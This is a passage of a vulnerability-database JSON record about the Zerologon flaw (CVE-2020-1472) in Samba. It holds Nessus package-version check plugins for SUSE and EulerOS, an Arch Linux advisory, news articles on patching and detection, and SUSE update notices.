reference:\"libdcerpc0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-krb5pac0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-krb5pac0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-krb5pac0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-nbt0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-nbt0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-nbt0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-nbt0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-standard0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-standard0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-standard0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-standard0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libnetapi0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libnetapi0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libnetapi0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libnetapi0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-credentials0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-credentials0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-credentials0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-credentials0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-errors0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-errors0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-errors0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-errors0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-hostconfig0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-hostconfig0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-hostconfig0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-passdb0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-passdb0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-passdb0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-passdb0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-util0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-util0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-util0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-util0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamdb0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamdb0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamdb0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamdb0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbclient0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbclient0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbclient0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbclient0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbconf0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbconf0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbconf0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbconf0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbldap0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbldap0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbldap0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbldap0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libtevent-util0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libtevent-util0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libtevent-util0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libtevent-util0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwbclient0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwbclient0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwbclient0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwbclient0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-client-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-client-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-client-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-client-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-debugsource-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-libs-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-libs-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-libs-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-libs-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-winbind-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-winbind-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-winbind-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-winbind-debuginfo-4.4.2-38.36.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T09:06:50", "description": "According to the version of the samba packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon\n Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 4, "cvss3": {"score": 10.0, "vector": "AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-10-30T00:00:00", "title": "EulerOS 2.0 SP5 : samba (EulerOS-SA-2020-2299)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1472"], "modified": "2020-10-30T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:samba-winbind-clients", "p-cpe:/a:huawei:euleros:libsmbclient", "p-cpe:/a:huawei:euleros:samba-common-libs", "p-cpe:/a:huawei:euleros:samba-winbind", "p-cpe:/a:huawei:euleros:samba", "p-cpe:/a:huawei:euleros:samba-common", "p-cpe:/a:huawei:euleros:samba-winbind-modules", "p-cpe:/a:huawei:euleros:samba-libs", "p-cpe:/a:huawei:euleros:samba-common-tools", "p-cpe:/a:huawei:euleros:samba-client-libs", "p-cpe:/a:huawei:euleros:samba-client", "p-cpe:/a:huawei:euleros:libwbclient", "cpe:/o:huawei:euleros:2.0", "p-cpe:/a:huawei:euleros:samba-python"], "id": "EULEROS_SA-2020-2299.NASL", "href": "https://www.tenable.com/plugins/nessus/142110", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142110);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2020-1472\"\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : samba (EulerOS-SA-2020-2299)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the samba packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon\n Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2299\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cb63ee7d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-client-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libsmbclient-4.7.1-9.h21.eulerosv2r7\",\n \"libwbclient-4.7.1-9.h21.eulerosv2r7\",\n \"samba-4.7.1-9.h21.eulerosv2r7\",\n \"samba-client-4.7.1-9.h21.eulerosv2r7\",\n \"samba-client-libs-4.7.1-9.h21.eulerosv2r7\",\n \"samba-common-4.7.1-9.h21.eulerosv2r7\",\n \"samba-common-libs-4.7.1-9.h21.eulerosv2r7\",\n \"samba-common-tools-4.7.1-9.h21.eulerosv2r7\",\n \"samba-libs-4.7.1-9.h21.eulerosv2r7\",\n \"samba-python-4.7.1-9.h21.eulerosv2r7\",\n \"samba-winbind-4.7.1-9.h21.eulerosv2r7\",\n \"samba-winbind-clients-4.7.1-9.h21.eulerosv2r7\",\n \"samba-winbind-modules-4.7.1-9.h21.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2020-11-06T11:39:41", "bulletinFamily": "unix", "cvelist": ["CVE-2020-1472"], "description": "Arch Linux Security Advisory ASA-202009-17\n==========================================\n\nSeverity: Medium\nDate : 2020-09-29\nCVE-ID : CVE-2020-1472\nPackage : samba\nType : access restriction bypass\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1236\n\nSummary\n=======\n\nThe package samba before version 4.13.0-1 is vulnerable to access\nrestriction bypass.\n\nResolution\n==========\n\nUpgrade to 4.13.0-1.\n\n# pacman -Syu \"samba>=4.13.0-1\"\n\nThe problem has been fixed upstream in version 4.13.0.\n\nWorkaround\n==========\n\nEnsure you do not have an schannel directive and if you do make sure\nit's either = yes or = auto.\n\nDescription\n===========\n\nA flaw was found in the Microsoft Windows Netlogon Remote Protocol (MS-\nNRPC), where it reuses a known, static, zero-value initialization\nvector (IV) in AES-CFB8 mode. This flaw allows an unauthenticated\nattacker to impersonate a domain-joined computer, including a domain\ncontroller, and possibly obtain domain administrator privileges. The\nhighest threat from this vulnerability is to confidentiality,\nintegrity, as well as system availability.\n\nImpact\n======\n\nAn unauthenticated attacker can gain administrator access through\ncrafted traffic, if the samba server is configured to run with a\nvulnerable schannel directive.\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/67983\nhttps://www.samba.org/samba/security/CVE-2020-1472.html\nhttps://security.archlinux.org/CVE-2020-1472", "modified": "2020-09-29T00:00:00", "published": "2020-09-29T00:00:00", "id": "ASA-202009-17", "href": "https://security.archlinux.org/ASA-202009-17", "type": "archlinux", "title": "[ASA-202009-17] samba: access restriction bypass", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2020-09-23T19:53:11", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "[](<https://thehackernews.com/images/-N0xbcq-gxX8/X2uOzdrqNPI/AAAAAAAAA0Q/VtK0ivICfDwyIva4z0EZIsiVjIzSFGUjwCLcBGAsYHQ/s728/zerologon-hacking.jpg>)\n\n \nIf you're administrating Windows Server, make sure it's up to date with all recent patches issued by Microsoft, especially the one that fixes a recently patched critical vulnerability that could allow unauthenticated attackers to compromise the domain controller.\n\nDubbed 'Zerologon' (CVE-2020-1472) and discovered by Tom Tervoort of [Secura](<https://www.secura.com/blog/zero-logon>), the privilege escalation vulnerability exists due to the insecure usage of AES-CFB8 encryption for Netlogon sessions, allowing remote attackers to establish a connection to the targeted domain controller over Netlogon Remote Protocol (MS-NRPC).\n\n\"The attack utilizes flaws in an authentication protocol that validates the authenticity and identity of a domain-joined computer to the Domain Controller. Due to the incorrect use of an AES mode of operation, it is possible to spoof the identity of any computer account (including that of the DC itself) and set an empty password for that account in the domain,\" researchers at [cybersecurity firm Cynet](<https://www.cynet.com/zerologon>) explain in a blog post.\n\n[](<https://go.thn.li/contrast> \"cybersecurity\" )\n\nThough the vulnerability, with a CVSS score of 10.0, was first disclosed to the public when [Microsoft released a patch](<https://thehackernews.com/2020/08/microsoft-software-patches.html>) for it in August, it became a matter of sudden concern after researchers published technical details and proof-of-concept of the flaw last week.\n\nAlong with [Indian](<https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES02&VLCODE=CIAD-2020-0063>) and [Australian](<https://www.cyber.gov.au/acsc/view-all-content/alerts/netlogon-elevation-privilege-vulnerability-cve-2020-1472>) Government agencies, the United States Cybersecurity and Infrastructure Security Agency (CISA) also issued an [emergency directive](<https://cyber.dhs.gov/ed/20-04/>) instructing federal agencies to patch Zerologon flaws on Windows Servers immediately.\n\n\"By sending a number of Netlogon messages in which various fields are filled with zeroes, an unauthenticated attacker could change the computer password of the domain controller that is stored in the AD. This can then be used to obtain domain admin credentials and then restore the original DC password,\" the advisories say.\n\nAccording to Secura, the said flaw can be exploited in the following sequence:\n\n * Spoofing the client credential\n * Disabling RPC Signing and Sealing\n * Spoofing a call\n * Changing Computer's AD Password\n * Changing Domain Admin Password\n\n\"CISA has determined that this vulnerability poses an unacceptable risk to the Federal Civilian Executive Branch and requires an immediate and emergency action.\"\n\n\"If affected domain controllers cannot be updated, ensure they are removed from the network,\" CISA advised.\n\nMoreover, Samba\u2014an implementation of SMB networking protocol for Linux systems\u2014versions 4.7 and below are also vulnerable to the Zerologon flaw. Now, a patch update for this software has also been issued.\n\nBesides explaining the root cause of the issue, Cynet also released details for some critical artifacts that can be used to detect active exploitation of the vulnerability, including a specific memory pattern in lsass.exe memory and an abnormal spike in traffic between lsass.exe.\n\n[](<https://thehackernews.com/images/-YdHbLGBiv_g/X2uI6ukEXFI/AAAAAAAAA0E/7psHpWRafPs7SEs6Jypd0ns2PuAWNrFzwCLcBGAsYHQ/s0/windows-server.gif>)\n\n\"The most documented artifact is Windows Event ID 4742 'A computer account was changed', often combined with Windows Event ID 4672 'Special privileges assigned to new logon'.\"\n\nTo let Windows Server users quickly detect related attacks, experts also released the YARA rule that can detect attacks that occurred prior to its deployment, whereas for realtime monitoring is a simple tool is also [available for download](<https://go.cynet.com/hubfs/Cynet-Zerologon-Detector.zip>).\n\nHowever, to completely patch the issue, users still recommend installing the latest software update from Microsoft as soon as possible.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2020-09-23T18:09:58", "published": "2020-09-23T18:08:00", "id": "THN:F4928090525451C50A1B016ED3B0650F", "href": "https://thehackernews.com/2020/09/detecting-and-preventing-critical.html", "type": "thn", "title": "Detecting and Preventing Critical ZeroLogon Windows Server Vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-29T17:45:23", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "[](<https://thehackernews.com/images/-OmeZzerf_N4/X3NtaoiyhdI/AAAAAAAAAi8/u8cq1mrPXdgdsFqdMJ1DsNqrUiSeIC0bQCLcBGAsYHQ/s728/webinar.jpg>)\n\n \nI am sure that many of you have by now heard of a recently disclosed critical Windows server vulnerability\u2014called [Zerologon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>)\u2014that could let hackers completely take over enterprise networks.\n\nFor those unaware, in brief, all supported versions of the Windows Server operating systems are vulnerable to a critical privilege escalation bug that resides in the [Netlogon Remote Control](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/ff8f970f-3e37-40f7-bd4b-af7336e4792f>) Protocol for Domain Controllers.\n\nIn other words, the underlying vulnerability ([CVE-2020-1472](<https://www.secura.com/pathtoimg.php?id=2055>)) could be exploited by an attacker to compromise Active Directory services, and eventually, the Windows domain without requiring any authentication.\n\nWhat's worse is that a proof-of-concept exploit for this flaw was released to the public last week, and immediately after, attackers started exploiting the weakness against unpatched systems in the wild.\n\n[](<https://thehackernews.com/images/-LlDoRgABjaM/X3NtIHP8GkI/AAAAAAAAAi0/5IgY1LPymBsVm0FHNJsBkmUWqgqC1c-UACLcBGAsYHQ/s0/zerologon.jpg>)\n\nAs described in our [coverage](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>) based on a technical analysis published by Cynet security researchers, the underlying issue is Microsoft's implementation of AES-CFB8, where it failed to use unique, random salts for these Netlogon messages.\n\nThe attacker needs to send a specially crafted string of zeros in Netlogon messages to change the domain controller's password stored in the Active Directory.\n\nFor THN readers willing to learn more about this threat in detail, including technical information, mitigations, and detection techniques, they should join a live webinar ([register here](<https://go.cynet.com/webinar-zerologon/?utm_source=thn>)) with Aviad Hasnis, CTO at Cynet.\n\nThe free cybersecurity educational webinar is scheduled for September 30th at 5:00 PM GMT, and also aims to discuss exploits deployed in the wild to take advantage of this vulnerability.\n\nBesides this, the Cynet team has also released a free detection tool that alerts you to any Zerologon exploitation in your environment.\n\n[Register for the live webinar here](<https://go.cynet.com/webinar-zerologon/?utm_source=thn>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2020-09-29T17:26:49", "published": "2020-09-29T17:26:00", "id": "THN:F53D18B9EB0F8CD70C9289288AC9E2E1", "href": "https://thehackernews.com/2020/09/zerologon-cybersecurity.html", "type": "thn", "title": "LIVE Webinar on Zerologon Vulnerability: Technical Analysis and Detection", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2020-09-24T16:42:22", "bulletinFamily": "unix", "cvelist": ["CVE-2020-1472"], "description": "This update for samba fixes the following issues:\n\n - ZeroLogon: An elevation of privilege was possible with some non default\n configurations when an attacker established a vulnerable Netlogon\n secure channel connection to a domain controller, using the Netlogon\n Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\n This update was imported from the SUSE:SLE-15-SP1:Update update project.\n\n", "edition": 1, "modified": "2020-09-24T15:15:28", "published": "2020-09-24T15:15:28", "id": "OPENSUSE-SU-2020:1513-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00080.html", "title": "Security update for samba (important)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-25T16:42:30", "bulletinFamily": "unix", "cvelist": ["CVE-2020-1472"], "description": "This update for samba fixes the following issues:\n\n - ZeroLogon: An elevation of privilege was possible with some non default\n configurations when an attacker established a vulnerable Netlogon secure\n channel connection to a domain controller, using the Netlogon Remote\n Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\n - Update to samba 4.11.13\n + s3: libsmb: Fix SMB2 client rename bug to a Windows server;\n (bso#14403);\n + dsdb: Allow &quot;password hash userPassword schemes = CryptSHA256&quot; to work\n on RHEL7; (bso#14424);\n + dbcheck: Allow a dangling forward link outside our known NCs;\n (bso#14450);\n + lib/debug: Set the correct default backend loglevel to\n MAX_DEBUG_LEVEL; (bso#14426);\n + s3:smbd: PANIC: assert failed in get_lease_type(); (bso#14428);\n + lib/util: do not install &quot;test_util_paths&quot;; (bso#14370);\n + lib:util: Fix smbclient -l basename dir; (bso#14345);\n + s3:smbd: PANIC: assert failed in get_lease_type(); (bso#14428);\n + util: Allow symlinks in directory_create_or_exist; (bso#14166);\n + docs: Fix documentation for require_membership_of of pam_winbind;\n (bso#14358);\n + 